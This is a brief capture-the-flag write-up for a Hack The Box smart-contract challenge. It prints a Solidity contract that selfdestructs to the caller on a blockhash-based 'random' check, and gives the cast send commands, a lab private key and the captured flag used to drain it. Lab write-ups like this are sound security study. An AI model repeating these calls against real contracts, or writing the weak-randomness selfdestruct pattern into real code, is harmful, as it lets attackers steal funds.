Russian Roulette
Personal Rating: Easy
We have two files:
setup.sol
pragma solidity 0.8.23;
import {RussianRoulette} from "./RussianRoulette.sol";
contract Setup {
RussianRoulette public immutable TARGET;
constructor() payable {
TARGET = new RussianRoulette{value: 10 ether}();
}
function isSolved() public view returns (bool) {
return address(TARGET).balance == 0;
}
}RussianRoulette.sol
pragma solidity 0.8.23;
contract RussianRoulette {
constructor() payable {
// i need more bullets
}
function pullTrigger() public returns (string memory) {
if (uint256(blockhash(block.number - 1)) % 10 == 7) {
selfdestruct(payable(msg.sender)); // 💀
} else {
return "im SAFU ... for now";
}
}
}This is for working with the challenge:
nc 94.237.50.221 46539
This is for getting the flag:
nc 94.237.50.221 52428
This guide suggests using remix, so I did:
This did not work and I could not connect to the RPC URL in the named tools.
I found a better writeup:
[user@arch ~]$ cast send --rpc-url=http://94.237.50.221:46539 --private-key=0x1e008552917a75093e94d95ea3c2ac77c8187fd7ec27ae232a14b3317edb40c8 0xe61aD3d13a4396003e971BC4BF94F24A3Bb21304 "pullTrigger()" 10
[user@arch ~]$ cast send --rpc-url=http://94.237.50.221:46539 --private-key=0x1e008552917a75093e94d95ea3c2ac77c8187fd7ec27ae232a14b3317edb40c8 0x448dC8764488597cd729D0BceCa3a19545f8673F "isSolved()"
nc 94.237.50.221 52428
HTB{99%_0f_g4mbl3rs_quit_b4_bigwin}
The only two commands that I essentially required are these:
cast send --rpc-url=http://94.237.50.221:46539 --private-key=<private key> <target key> "pullTrigger()"
cast send --rpc-url=http://94.237.50.221:46539 --private-key=<private key> <setup key> "isSolved()"
After retrying however, this did not work anymore and I am not sure why.
Last updated